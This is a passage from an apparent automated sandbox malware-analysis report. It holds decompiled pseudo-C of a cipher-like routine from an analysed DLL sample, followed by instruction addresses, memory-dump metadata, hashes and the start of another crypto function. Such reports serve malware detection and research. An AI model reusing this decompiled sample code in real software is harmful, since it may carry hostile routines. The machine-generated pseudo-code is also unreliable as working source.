				_v12 = (_t1450 | _v16) ^  *(__eax + 0x128) ^  !_t643 ^ _t901 << 0x00000007 ^ _t1183;
				asm("ror esi, 0x5");
				_t1724 =  *(__eax + 0x120) ^ _v32 ^ _v28 ^ _t643 ^ _t1183 ^ _t901;
				asm("ror edx, 0x7");
				asm("ror ecx, 1");
				_v8 = _t1183 ^ _t1724 << 0x00000003 ^ _v12;
				_t903 = _t901 ^ _v12 ^ _t1724;
				asm("ror dword [ebp-0x8], 0x3");
				asm("ror esi, 0xd");
				_t646 = (_t903 | _t1724) & _v8;
				_t1188 = _t903 & _t1724 | _v12;
				_t647 = _t646 ^ _t903;
				_t1459 = _t646 ^ _t1188;
				_t908 = ( !_v8 ^ _t1459 | _t647) ^ _t1724;
				_v28 = _t1188;
				_t1192 = (_t908 | _v8) ^ _t647 ^ _v12;
				_t909 = _t908 ^  *(__eax + 0x114);
				_v28 = _v28 ^ _t908;
				_t1460 = _t1459 ^  *(__eax + 0x11c);
				_v32 = _t1459 & _t1724 ^ _t1192;
				asm("ror ebx, 0x16");
				_t657 =  *(__eax + 0x118) ^ _v32 ^ _v28 ^ _t909 << 0x00000007 ^ _t1460;
				asm("ror esi, 0x5");
				_t1730 =  *(__eax + 0x110) ^ _t1192 ^ _t909 ^ _t1460;
				asm("ror edi, 0x7");
				_t1462 = _t1460 ^ _t1730 << 0x00000003 ^ _t657;
				asm("ror ecx, 1");
				asm("ror ebx, 0x3");
				_v16 = _t909 ^ _t657 ^ _t1730;
				_v12 = _t1462;
				asm("ror esi, 0xd");
				_t913 = _t657 ^ _t1730;
				_t1199 = ( !_t657 | _t1730) ^ _v16 ^ _t1462;
				_t1733 = (_t1730 | _v16) ^ _t1199 | _t913 & _v16;
				_t1466 = _t1733 ^ _t657;
				_t1200 = _t1199 ^  *(__eax + 0x104);
				_t659 =  !_t1199;
				_t916 = (_t913 | _v12) ^ _t659 ^ _t1733;
				_t1735 = _t916 ^  *(__eax + 0x10c);
				_v32 = _t916 & _t1466;
				asm("ror ecx, 0x16");
				_t923 =  *(__eax + 0x108) ^ _v32 ^ _t659 ^ _v16 ^ _t1200 << 0x00000007 ^ _t1735;
				asm("ror ebx, 0x5");
				_t665 =  *(__eax + 0x100) ^ _t1466 ^ _t1735 ^ _t1200;
				asm("ror esi, 0x7");
				asm("ror edx, 1");
				_t1202 = _t1200 ^ _t923 ^ _t665;
				asm("ror ecx, 0x3");
				_t1470 =  !_t923;
				_v8 = _t1735 ^ _t665 << 0x00000003 ^ _t923;
				_t1740 = _t1470 & _t1202 ^ _v8;
				asm("ror ebx, 0xd");
				_v32 = _t1740;
				_t1741 = _t1740 & _t665;
				_v28 = _t1741;
				_t1743 = _t1741 ^ _t1470 ^ _t1202;
				_v20 = _t1470;
				_v16 = _t1202;
				_t1744 = _t1743 ^  *(__eax + 0xfc);
				_t1472 = _t1743 | _t1202;
				_t1204 = _v8 | _t665;
				_v24 = _t1472;
				_v12 = _t1204;
				_t1475 = _t1472 & _t665 ^  *(__eax + 0xf4) ^ _v32;
				asm("ror ecx, 0x16");
				_t929 = (_t923 ^ _t665 | _v28) ^ _t1204 & _v16 ^  *(__eax + 0xf8) ^ _t1475 << 0x00000007 ^ _t1744;
				asm("ror edx, 0x5");
				_t1213 =  *(__eax + 0xf0) ^ _v12 ^ _v24 ^ _v20 ^ _t1475 ^ _t1744;
				asm("ror esi, 0x7");
				asm("ror edi, 1");
				asm("ror ecx, 0x3");
				_t668 = _t1744 ^ _t1213 << 0x00000003 ^ _t929;
				_t1747 = _t1475 ^ _t929 ^ _t1213;
				asm("ror edx, 0xd");
				_v16 = _t929;
				_t931 = (_t929 | _t668) ^ _t1747;
				_v8 = _t1747 | _t668;
				_v12 = _t668;
				_t1752 = (_t1213 ^ _t668) & _v8 ^ _t931;
				_t1479 = _t931 & _t1213;
				_t1214 =  !_t1213;
				_t1753 = _t1752 ^  *(__eax + 0xec);
				_v32 = _t1214 | _t1752;
				_t1219 =  *(__eax + 0xe4) ^ _t1479 ^ _v16 ^ _v12;
				_v28 = _v16 ^ _t1752 | _t1214;
				asm("ror edi, 0x16");
				asm("ror ebx, 0x5");
				_t678 =  *(__eax + 0xe0) ^ _v28 ^ _t931 ^ _t1753 ^ _t1219;
				asm("ror esi, 0x7");
				_t934 = (_t1479 | _v16) ^  *(__eax + 0xe8) ^ _v32 ^ _v8 ^ _t1219 << 0x00000007 ^ _t1753;
				asm("ror edx, 1");
				_t1221 = _t1219 ^ _t934 ^ _t678;
				asm("ror ecx, 0x3");
				_t1487 = _t934 | _t1221;
				_v8 = _t1753 ^ _t678 << 0x00000003 ^ _t934;
				_v12 = _t1487;
				asm("ror ebx, 0xd");
				_t1757 = _t934 ^ _t1221;
				_t1489 = _t1487 ^ _t934 ^ _t678;
				_t1223 = _t1489 | _v8;
				_v16 = _t1223 ^ _t1757;
				_t939 = _v12 ^ _v8 ^ _t678;
				_t1225 = (_t1223 | _t1757) ^ _t939;
				_t1760 = (_t939 | _v16) ^ _t1489 & _t678 ^  *(__eax + 0xd4);
				_t948 = (_t1225 & _t678 ^ _v12) & _v16 ^  *(__eax + 0xdc) ^ _t1489;
				asm("ror edi, 0x16");
				_t1493 =  *(__eax + 0xd8) ^ _t1225 ^ _t1760 << 0x00000007 ^ _t948;
				asm("ror edx, 0x5");
				_t1231 =  *(__eax + 0xd0) ^ _v16 ^ _t1760 ^ _t948;
				asm("ror ecx, 0x7");
				asm("ror esi, 1");
				_v12 = _t948 ^ _t1231 << 0x00000003 ^ _t1493;
				_t951 = _t1760 ^ _t1493 ^ _t1231;
				asm("ror edi, 0x3");
				asm("ror edx, 0xd");
				_t682 = _t951 ^ _v12;
				_v16 = _t1493 ^ _t1231;
				_t1766 = _t682 ^ _t1493;
				_t1496 = _t1766 & _t951 ^ _v16;
				_t1767 =  !_t1766;
				_t957 = (( !_t682 | _t1231) ^ _v12 | _v16) ^ _t682;
				_t958 = _t957 ^  *(__eax + 0xcc);
				_t684 = _t957 | _t1496;
				_t1234 =  *(__eax + 0xc4) ^ _t684 ^ _t1767;
				asm("ror esi, 0x16");
				_t1773 = _t1767 & _v12 ^  *(__eax + 0xc8) ^ _t684 ^ _v16 ^ _t1234 << 0x00000007 ^ _t958;
				asm("ror ebx, 0x5");
				_t690 =  *(__eax + 0xc0) ^ _t1496 ^ _t958 ^ _t1234;
				asm("ror ecx, 0x7");
				asm("ror edx, 1");
				asm("ror esi, 0x3");
				_v12 = _t1773;
				_v8 = _t958 ^ _t690 << 0x00000003 ^ _t1773;
				_t961 = _t1234 ^ _t1773 ^ _t690;
				asm("ror ebx, 0xd");
				_t1501 = _v12 ^ _t961 ^ _t690;
				_t1239 = (_v8 | _t961) ^ _t1501;
				_t1775 = _v8 ^ _t690;
				_v32 = _t1501;
				_v28 = _t1775;
				_t1505 = ((_t1775 | _v12) ^ _t961) & _v32;
				_v32 = _t1505;
				_t1777 = _t1505 ^ _v28;
				_t1778 = _t1777 ^  *(__eax + 0xb4);
				_t1240 = _t1239 ^  *(__eax + 0xbc);
				_v16 =  !(_t961 & _t690) ^ _v32;
				asm("ror ecx, 0x16");
				_t969 =  *(__eax + 0xb8) ^ _v16 ^ _t1777 & _t1239 ^ _t1778 << 0x00000007 ^ _t1240;
				asm("ror edi, 0x5");
				_t1516 = _v8 & _t690 ^  *(__eax + 0xb0) ^ _v16 ^ _v12 ^ _t1778 ^ _t1240;
				asm("ror edx, 0x7");
				_t1242 = _t1240 ^ _t1516 << 0x00000003 ^ _t969;
				asm("ror esi, 1");
				_t1780 = _t1778 ^ _t969 ^ _t1516;
				asm("ror ecx, 0x3");
				_v12 = _t1242;
				_t694 = _t969 ^ _t1242;
				asm("ror edi, 0xd");
				_t1245 = _t1516 ^ _t1780 ^ _v12;
				_v16 = _t1780;
				_t1783 = (_t1245 | _t969) ^ _t1516;
				_t972 = _t1783 & _t694 ^ _t1245;
				_t1247 = _v16 & _v12;
				_v28 = _t1247;
				_t1249 = (_t1247 | _t972) ^  !_t1783;
				_t1250 = _t1249 ^  *(__eax + 0xac);
				_t973 = _t972 ^  *(__eax + 0xa4);
				_v32 = _t1249 | _t972;
				asm("ror edi, 0x16");
				_v12 = (_t1516 | _v16) ^  *(__eax + 0xa8) ^  !_t694 ^ _t973 << 0x00000007 ^ _t1250;
				asm("ror esi, 0x5");
				_t1796 =  *(__eax + 0xa0) ^ _v32 ^ _v28 ^ _t694 ^ _t1250 ^ _t973;
				asm("ror edx, 0x7");
				asm("ror ecx, 1");
				_v8 = _t1250 ^ _t1796 << 0x00000003 ^ _v12;
				_t975 = _t973 ^ _v12 ^ _t1796;
				asm("ror dword [ebp-0x8], 0x3");
				asm("ror esi, 0xd");
				_t697 = (_t975 | _t1796) & _v8;
				_t1255 = _t975 & _t1796 | _v12;
				_t698 = _t697 ^ _t975;
				_t1525 = _t697 ^ _t1255;
				_t980 = ( !_v8 ^ _t1525 | _t698) ^ _t1796;
				_v28 = _t1255;
				_t1259 = (_t980 | _v8) ^ _t698 ^ _v12;
				_t981 = _t980 ^  *(__eax + 0x94);
				_v28 = _v28 ^ _t980;
				_t1526 = _t1525 ^  *(__eax + 0x9c);
				_v32 = _t1525 & _t1796 ^ _t1259;
				asm("ror ebx, 0x16");
				_t708 =  *(__eax + 0x98) ^ _v32 ^ _v28 ^ _t981 << 0x00000007 ^ _t1526;
				asm("ror esi, 0x5");
				_t1802 =  *(__eax + 0x90) ^ _t1259 ^ _t981 ^ _t1526;
				asm("ror edi, 0x7");
				_t1528 = _t1526 ^ _t1802 << 0x00000003 ^ _t708;
				_v12 = _t1528;
				asm("ror ecx, 1");
				asm("ror ebx, 0x3");
				asm("ror esi, 0xd");
				_v16 = _t981 ^ _t708 ^ _t1802;
				_t985 = _t708 ^ _t1802;
				_t1266 = ( !_t708 | _t1802) ^ _v16 ^ _t1528;
				_t1805 = (_t1802 | _v16) ^ _t1266 | _t985 & _v16;
				_t1532 = _t1805 ^ _t708;
				_t1267 = _t1266 ^  *(__eax + 0x84);
				_t710 =  !_t1266;
				_t988 = (_t985 | _v12) ^ _t710 ^ _t1805;
				_t1807 = _t988 ^  *(__eax + 0x8c);
				_v32 = _t988 & _t1532;
				asm("ror ecx, 0x16");
				_t995 =  *(__eax + 0x88) ^ _v32 ^ _t710 ^ _v16 ^ _t1267 << 0x00000007 ^ _t1807;
				asm("ror ebx, 0x5");
				_t716 =  *(__eax + 0x80) ^ _t1532 ^ _t1807 ^ _t1267;
				asm("ror esi, 0x7");
				asm("ror edx, 1");
				_t1269 = _t1267 ^ _t995 ^ _t716;
				asm("ror ecx, 0x3");
				_v8 = _t1807 ^ _t716 << 0x00000003 ^ _t995;
				_t1536 =  !_t995;
				_t1812 = _t1536 & _t1269 ^ _v8;
				asm("ror ebx, 0xd");
				_v32 = _t1812;
				_t1813 = _t1812 & _t716;
				_v28 = _t1813;
				_t1815 = _t1813 ^ _t1536 ^ _t1269;
				_v20 = _t1536;
				_t1816 = _t1815 ^  *(__eax + 0x7c);
				_t1538 = _t1815 | _t1269;
				_v16 = _t1269;
				_t1271 = _v8 | _t716;
				_v24 = _t1538;
				_v12 = _t1271;
				_t1541 = _t1538 & _t716 ^  *(__eax + 0x74) ^ _v32;
				asm("ror ecx, 0x16");
				_t1001 = (_t995 ^ _t716 | _v28) ^ _t1271 & _v16 ^  *(__eax + 0x78) ^ _t1541 << 0x00000007 ^ _t1816;
				asm("ror edx, 0x5");
				_t1280 =  *(__eax + 0x70) ^ _v12 ^ _v24 ^ _v20 ^ _t1541 ^ _t1816;
				asm("ror esi, 0x7");
				asm("ror edi, 1");
				_t719 = _t1816 ^ _t1280 << 0x00000003 ^ _t1001;
				asm("ror ecx, 0x3");
				_t1819 = _t1541 ^ _t1001 ^ _t1280;
				asm("ror edx, 0xd");
				_v16 = _t1001;
				_t1003 = (_t1001 | _t719) ^ _t1819;
				_v8 = _t1819 | _t719;
				_v12 = _t719;
				_t1824 = (_t1280 ^ _t719) & _v8 ^ _t1003;
				_t1545 = _t1003 & _t1280;
				_t1281 =  !_t1280;
				_t1825 = _t1824 ^  *(__eax + 0x6c);
				_v32 = _t1281 | _t1824;
				_t1286 =  *(__eax + 0x64) ^ _t1545 ^ _v16 ^ _v12;
				_v28 = _v16 ^ _t1824 | _t1281;
				asm("ror edi, 0x16");
				asm("ror ebx, 0x5");
				_t729 =  *(__eax + 0x60) ^ _v28 ^ _t1003 ^ _t1825 ^ _t1286;
				asm("ror esi, 0x7");
				_t1006 = (_t1545 | _v16) ^  *(__eax + 0x68) ^ _v32 ^ _v8 ^ _t1286 << 0x00000007 ^ _t1825;
				asm("ror edx, 1");
				_t1288 = _t1286 ^ _t1006 ^ _t729;
				asm("ror ecx, 0x3");
				_v8 = _t1825 ^ _t729 << 0x00000003 ^ _t1006;
				_t1553 = _t1006 | _t1288;
				asm("ror ebx, 0xd");
				_t1829 = _t1006 ^ _t1288;
				_v12 = _t1553;
				_t1555 = _t1553 ^ _t1006 ^ _t729;
				_t1290 = _t1555 | _v8;
				_v16 = _t1290 ^ _t1829;
				_t1011 = _v12 ^ _v8 ^ _t729;
				_t1292 = (_t1290 | _t1829) ^ _t1011;
				_t1832 = (_t1011 | _v16) ^ _t1555 & _t729 ^  *(__eax + 0x54);
				_t1020 = (_t1292 & _t729 ^ _v12) & _v16 ^  *(__eax + 0x5c) ^ _t1555;
				asm("ror edi, 0x16");
				_t1559 =  *(__eax + 0x58) ^ _t1292 ^ _t1832 << 0x00000007 ^ _t1020;
				asm("ror edx, 0x5");
				_t1298 =  *(__eax + 0x50) ^ _v16 ^ _t1832 ^ _t1020;
				asm("ror ecx, 0x7");
				asm("ror esi, 1");
				_v12 = _t1020 ^ _t1298 << 0x00000003 ^ _t1559;
				_t1023 = _t1832 ^ _t1559 ^ _t1298;
				asm("ror edi, 0x3");
				_t733 = _t1023 ^ _v12;
				asm("ror edx, 0xd");
				_v16 = _t1559 ^ _t1298;
				_t1838 = _t733 ^ _t1559;
				_t1562 = _t1838 & _t1023 ^ _v16;
				_t1839 =  !_t1838;
				_t1029 = (( !_t733 | _t1298) ^ _v12 | _v16) ^ _t733;
				_t1030 = _t1029 ^  *(__eax + 0x4c);
				_t735 = _t1029 | _t1562;
				_t1301 =  *(__eax + 0x44) ^ _t735 ^ _t1839;
				_v32 = _t1562;
				asm("ror esi, 0x16");
				_t736 = _t1839 & _v12 ^  *(__eax + 0x48) ^ _t735 ^ _v16 ^ _t1301 << 0x00000007 ^ _t1030;
				asm("ror edi, 0x5");
				_t1568 =  *(__eax + 0x40) ^ _v32 ^ _t1030 ^ _t1301;
				asm("ror ecx, 0x7");
				asm("ror edx, 1");
				asm("ror ebx, 0x3");
				_t1848 = _t1030 ^ _t1568 << 0x00000003 ^ _t736;
				_v12 = _t736;
				_t1033 = _t1301 ^ _t736 ^ _t1568;
				asm("ror edi, 0xd");
				_t738 = _t736 ^ _t1033 ^ _t1568;
				_v8 = _t1848;
				_t1306 = (_v8 | _t1033) ^ _t738;
				_t1849 = _t1848 ^ _t1568;
				_v32 = _t738;
				_v28 = _t1849;
				_t742 = ((_t1849 | _v12) ^ _t1033) & _v32;
				_t1851 = _t742 ^ _v28;
				_v32 = _t742;
				_t1036 =  !(_t1033 & _t1568) ^ _v32;
				_t1852 = _t1851 ^  *(__eax + 0x34);
				_t1307 = _t1306 ^  *(__eax + 0x3c);
				_v28 = _t1851 & _t1306;
				_v32 = _t1036;
				asm("ror ebx, 0x16");
				_t749 =  *(__eax + 0x38) ^ _t1036 ^ _v28 ^ _t1852 << 0x00000007 ^ _t1307;
				asm("ror ecx, 0x5");
				_t1045 = _v8 & _t1568 ^  *(__eax + 0x30) ^ _v32 ^ _v12 ^ _t1852 ^ _t1307;
				asm("ror edx, 0x7");
				_t1309 = _t1307 ^ _t1045 << 0x00000003 ^ _t749;
				asm("ror esi, 1");
				_t1854 = _t1852 ^ _t749 ^ _t1045;
				asm("ror ebx, 0x3");
				_t1572 = _t749 ^ _t1309;
				asm("ror ecx, 0xd");
				_v12 = _t1309;
				_t1312 = _t1045 ^ _t1854 ^ _v12;
				_v16 = _t1854;
				_t1857 = (_t1312 | _t749) ^ _t1045;
				_t752 = _t1572 & _t1857 ^ _t1312;
				_t1314 = _v16 & _v12;
				_v32 = _t1314;
				_t1316 = (_t1314 | _t752) ^  !_t1857;
				_v8 = _t1316;
				_t1861 = __eax + 0x23c;
				_v12 = (_t1045 | _v16) ^  *(__eax + 0x28) ^  !_t1572 ^  *(__eax + 0x238);
				 *(__eax + 0x230) = _v48;
				 *(__eax + 0x234) = _v44;
				 *(__eax + 0x238) = _v40;
				_t536 =  &_v36; // 0x7d5274
				 *_t1861 =  *_t536;
				_t544 = _a4;
				 *_t544 = (_t1316 | _t752) ^  *(__eax + 0x20) ^ _t1572 ^  *(__eax + 0x230) ^ _v32;
				_t544[1] = _t752 ^  *(__eax + 0x24) ^  *(__eax + 0x234);
				_t544[2] = _v12;
				_t544[3] = _v8 ^  *(__eax + 0x2c) ^  *_t1861;
				return _t544;
			}

0x007d5b45
0x007d5b4b
0x007d5b4b
0x007d5b4f
0x007d5b4f
0x007d5b53
0x007d5b56
0x007d5b56
0x007d5b59
0x007d5b5c
0x007d5b62
0x007d5b65
0x007d5b6b
0x007d5b6e
0x007d5b74
0x007d5b7d
0x007d5b80
0x007d5b8a
0x007d5b8c
0x007d5b91
0x007d5b96
0x007d5ba2
0x007d5bad
0x007d5bb0
0x007d5bbf
0x007d5bc5
0x007d5bd6
0x007d5be3
0x007d5be5
0x007d5bea
0x007d5bec
0x007d5bf8
0x007d5bfe
0x007d5c01
0x007d5c04
0x007d5c07
0x007d5c15
0x007d5c18
0x007d5c24
0x007d5c2b
0x007d5c2f
0x007d5c35
0x007d5c39
0x007d5c3d
0x007d5c45
0x007d5c58
0x007d5c66
0x007d5c6a
0x007d5c6f
0x007d5c71
0x007d5c7d
0x007d5c81
0x007d5c83
0x007d5c86
0x007d5c8b
0x007d5c91
0x007d5c94
0x007d5c97
0x007d5c9a
0x007d5c9c
0x007d5ca1
0x007d5ca3
0x007d5ca6
0x007d5cb0
0x007d5cb6
0x007d5cbb
0x007d5cbd
0x007d5cc3
0x007d5cd6
0x007d5cd9
0x007d5cec
0x007d5cf4
0x007d5cf9
0x007d5d00
0x007d5d07
0x007d5d09
0x007d5d0f
0x007d5d12
0x007d5d17
0x007d5d1a
0x007d5d1c
0x007d5d20
0x007d5d2a
0x007d5d30
0x007d5d36
0x007d5d38
0x007d5d3e
0x007d5d44
0x007d5d5b
0x007d5d61
0x007d5d69
0x007d5d7e
0x007d5d83
0x007d5d85
0x007d5d8f
0x007d5d93
0x007d5d97
0x007d5d99
0x007d5d9e
0x007d5da0
0x007d5da5
0x007d5da7
0x007d5daa
0x007d5daf
0x007d5db3
0x007d5dba
0x007d5dc5
0x007d5dc7
0x007d5dd8
0x007d5dea
0x007d5df9
0x007d5e07
0x007d5e09
0x007d5e0e
0x007d5e10
0x007d5e1c
0x007d5e22
0x007d5e25
0x007d5e27
0x007d5e2a
0x007d5e2f
0x007d5e36
0x007d5e3b
0x007d5e41
0x007d5e56
0x007d5e58
0x007d5e5c
0x007d5e62
0x007d5e66
0x007d5e7b
0x007d5e86
0x007d5e8a
0x007d5e8f
0x007d5e91
0x007d5e9d
0x007d5ea3
0x007d5ea6
0x007d5ea9
0x007d5eaf
0x007d5eb2
0x007d5eb4
0x007d5ebe
0x007d5ec2
0x007d5ec4
0x007d5ecc
0x007d5ed1
0x007d5ed6
0x007d5edb
0x007d5ee5
0x007d5eed
0x007d5ef3
0x007d5f06
0x007d5f16
0x007d5f1e
0x007d5f23
0x007d5f25
0x007d5f2f
0x007d5f31
0x007d5f35
0x007d5f37
0x007d5f3a
0x007d5f3d
0x007d5f42
0x007d5f44
0x007d5f4b
0x007d5f52
0x007d5f61
0x007d5f66
0x007d5f6b
0x007d5f70
0x007d5f74
0x007d5f7c
0x007d5f82
0x007d5f8d
0x007d5fa3
0x007d5fa8
0x007d5fad
0x007d5faf
0x007d5fbc
0x007d5fc1
0x007d5fc4
0x007d5fc6
0x007d5fca
0x007d5fd1
0x007d5fd8
0x007d5fdd
0x007d5fe2
0x007d5fea
0x007d5fec
0x007d5ff6
0x007d5ffe
0x007d6004
0x007d6009
0x007d6013
0x007d6027
0x007d6034
0x007d6036
0x007d603b
0x007d603d
0x007d6047
0x007d6049
0x007d604f
0x007d6052
0x007d6059
0x007d6063
0x007d6065
0x007d6068
0x007d6077
0x007d607b
0x007d607f
0x007d6085
0x007d6089
0x007d608d
0x007d6095
0x007d60a8
0x007d60b6
0x007d60ba
0x007d60bf
0x007d60c1
0x007d60cd
0x007d60d1
0x007d60d3
0x007d60d8
0x007d60da
0x007d60e1
0x007d60e4
0x007d60e7
0x007d60ea
0x007d60ec
0x007d60ef
0x007d60f4
0x007d60f6
0x007d60fb
0x007d6101
0x007d6106
0x007d6108
0x007d6113
0x007d6126
0x007d6129
0x007d613c
0x007d6144
0x007d6149
0x007d614b
0x007d6157
0x007d615d
0x007d6160
0x007d6162
0x007d6167
0x007d616a
0x007d616c
0x007d6170
0x007d617a
0x007d6180
0x007d6186
0x007d6188
0x007d618e
0x007d6194
0x007d61ab
0x007d61b1
0x007d61b9
0x007d61ce
0x007d61d3
0x007d61d5
0x007d61df
0x007d61e3
0x007d61e7
0x007d61e9
0x007d61ee
0x007d61f0
0x007d61f5
0x007d61fa
0x007d61fd
0x007d61ff
0x007d6203
0x007d620a
0x007d6215
0x007d6217
0x007d6228
0x007d623a
0x007d6249
0x007d6257
0x007d6259
0x007d625e
0x007d6260
0x007d626c
0x007d6272
0x007d6275
0x007d6277
0x007d627a
0x007d627f
0x007d6286
0x007d628b
0x007d6291
0x007d62a6
0x007d62a8
0x007d62ac
0x007d62b2
0x007d62b6
0x007d62cb
0x007d62d8
0x007d62da
0x007d62df
0x007d62e1
0x007d62ed
0x007d62f1
0x007d62f6
0x007d62f9
0x007d6302
0x007d630b
0x007d630e
0x007d6310
0x007d6312
0x007d6314
0x007d631c
0x007d6321
0x007d6326
0x007d632b
0x007d6335
0x007d633d
0x007d6343
0x007d6351
0x007d6366
0x007d636e
0x007d6373
0x007d6375
0x007d637f
0x007d6381
0x007d6385
0x007d6387
0x007d638a
0x007d638f
0x007d6391
0x007d6398
0x007d639b
0x007d63a2
0x007d63ab
0x007d63b0
0x007d63b5
0x007d63ba
0x007d63be
0x007d63c6
0x007d63d2
0x007d63db
0x007d63f3
0x007d63f8
0x007d63fd
0x007d63ff
0x007d640c
0x007d6411
0x007d6414
0x007d6416
0x007d641a
0x007d6421
0x007d6428
0x007d642d
0x007d6432
0x007d643a
0x007d643c
0x007d6446
0x007d644e
0x007d6454
0x007d6459
0x007d6463
0x007d6477
0x007d6484
0x007d6486
0x007d648b
0x007d648d
0x007d6497
0x007d6499
0x007d649f
0x007d64a2
0x007d64a5
0x007d64a8
0x007d64ad
0x007d64bb
0x007d64c7
0x007d64cb
0x007d64cf
0x007d64d5
0x007d64d9
0x007d64dd
0x007d64e5
0x007d64f8
0x007d6506
0x007d650a
0x007d650f
0x007d6511
0x007d651d
0x007d6521
0x007d6523
0x007d6528
0x007d652a
0x007d6531
0x007d6534
0x007d6537
0x007d653a
0x007d653c
0x007d6541
0x007d6543
0x007d6546
0x007d654b
0x007d6551
0x007d6556
0x007d655d
0x007d6568
0x007d656e
0x007d657e
0x007d6589
0x007d6594
0x007d6599
0x007d659b
0x007d65a7
0x007d65ad
0x007d65b0
0x007d65b2
0x007d65b4
0x007d65b7
0x007d65bc
0x007d65c0
0x007d65ca
0x007d65d0
0x007d65d6
0x007d65d8
0x007d65de
0x007d65e4
0x007d65fb
0x007d6601
0x007d6609
0x007d661e
0x007d6623
0x007d6625
0x007d662f
0x007d6633
0x007d6637
0x007d6639
0x007d663e
0x007d6640
0x007d6643
0x007d6648
0x007d664d
0x007d664f
0x007d6653
0x007d665a
0x007d6665
0x007d6667
0x007d6678
0x007d668a
0x007d6699
0x007d66a7
0x007d66a9
0x007d66ae
0x007d66b0
0x007d66bc
0x007d66c2
0x007d66c5
0x007d66c7
0x007d66ca
0x007d66cf
0x007d66d6
0x007d66db
0x007d66e1
0x007d66f6
0x007d66f8
0x007d66fc
0x007d6702
0x007d6706
0x007d671b
0x007d6728
0x007d672a
0x007d672f
0x007d6733
0x007d673d
0x007d6743
0x007d6746
0x007d674c
0x007d6752
0x007d675b
0x007d675e
0x007d6760
0x007d6762
0x007d6764
0x007d676c
0x007d6771
0x007d6776
0x007d677b
0x007d6785
0x007d678d
0x007d6793
0x007d67a1
0x007d67b6
0x007d67be
0x007d67c3
0x007d67c5
0x007d67cf
0x007d67d1
0x007d67d5
0x007d67d7
0x007d67da
0x007d67df
0x007d67e1
0x007d67e8
0x007d67eb
0x007d67f2
0x007d67f8
0x007d67fd
0x007d6802
0x007d6807
0x007d680e
0x007d681c
0x007d6822
0x007d682b
0x007d6843
0x007d6848
0x007d684d
0x007d684f
0x007d685c
0x007d6861
0x007d6864
0x007d6866
0x007d686a
0x007d6871
0x007d6878
0x007d687d
0x007d6882
0x007d688a
0x007d688c
0x007d6896
0x007d689e
0x007d68a4
0x007d68a9
0x007d68b3
0x007d68c7
0x007d68d4
0x007d68d6
0x007d68db
0x007d68dd
0x007d68e7
0x007d68e9
0x007d68ec
0x007d68f2
0x007d68f5
0x007d68f8
0x007d6906
0x007d690b
0x007d6917
0x007d691b
0x007d691f
0x007d6925
0x007d6929
0x007d692d
0x007d6935
0x007d6948
0x007d6956
0x007d695a
0x007d695f
0x007d6961
0x007d696d
0x007d6971
0x007d6973
0x007d6976
0x007d697b
0x007d6981
0x007d6984
0x007d6987
0x007d698a
0x007d698c
0x007d6991
0x007d6993
0x007d6998
0x007d699b
0x007d699d
0x007d69a3
0x007d69a5
0x007d69b2
0x007d69b8
0x007d69c0
0x007d69d0
0x007d69d8
0x007d69dd
0x007d69df
0x007d69eb
0x007d69f1
0x007d69f3
0x007d69f6
0x007d69f8
0x007d69fb
0x007d6a00
0x007d6a04
0x007d6a0e
0x007d6a14
0x007d6a1a
0x007d6a1c
0x007d6a22
0x007d6a25
0x007d6a36
0x007d6a3c
0x007d6a47
0x007d6a56
0x007d6a5b
0x007d6a5d
0x007d6a67
0x007d6a6b
0x007d6a6f
0x007d6a71
0x007d6a74
0x007d6a79
0x007d6a7d
0x007d6a80
0x007d6a82
0x007d6a87
0x007d6a8b
0x007d6a94
0x007d6a9f
0x007d6aa1
0x007d6aad
0x007d6abc
0x007d6ac8
0x007d6ad3
0x007d6ad5
0x007d6ada
0x007d6adc
0x007d6ae8
0x007d6aee
0x007d6af1
0x007d6af3
0x007d6af8
0x007d6afb
0x007d6b02
0x007d6b07
0x007d6b0d
0x007d6b1f
0x007d6b21
0x007d6b25
0x007d6b28
0x007d6b2c
0x007d6b31
0x007d6b41
0x007d6b48
0x007d6b50
0x007d6b55
0x007d6b57
0x007d6b63
0x007d6b69
0x007d6b6c
0x007d6b6e
0x007d6b71
0x007d6b75
0x007d6b78
0x007d6b7a
0x007d6b82
0x007d6b84
0x007d6b86
0x007d6b8e
0x007d6b93
0x007d6b9a
0x007d6b9d
0x007d6ba2
0x007d6ba7
0x007d6bac
0x007d6baf
0x007d6bba
0x007d6bbd
0x007d6bcf
0x007d6bd7
0x007d6bdc
0x007d6bde
0x007d6be8
0x007d6bea
0x007d6bee
0x007d6bf0
0x007d6bf5
0x007d6bf7
0x007d6bfa
0x007d6c01
0x007d6c04
0x007d6c0b
0x007d6c14
0x007d6c19
0x007d6c1f
0x007d6c26
0x007d6c31
0x007d6c53
0x007d6c5b
0x007d6c66
0x007d6c6f
0x007d6c78
0x007d6c7e
0x007d6c81
0x007d6c83
0x007d6c87
0x007d6c8d
0x007d6c90
0x007d6c93
0x007d6c98

Strings

tR}, xrefs: 007D6C7E

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID:
String ID: tR}
API String ID: 0-176171977
Opcode ID: 005ff60999730f8a5bfa208ed14f1ae49daddb1b2000ea72931efd9a765374d8
Instruction ID: 901912927254eab5ca48277708848aff1e73487379dbb27f6690fdeb1a51c147
Opcode Fuzzy Hash: 005ff60999730f8a5bfa208ed14f1ae49daddb1b2000ea72931efd9a765374d8
Instruction Fuzzy Hash: 6AD2EF77E042249FDB5CCFA6C4955AFF7B3BBCC210B57C1BE8916A7245CA7029428AC4

Uniqueness

Uniqueness Score: -1.00%

Function 007D73DB, Relevance: 1.9, APIs: 1, Instructions: 610
COMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E007D73DB(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
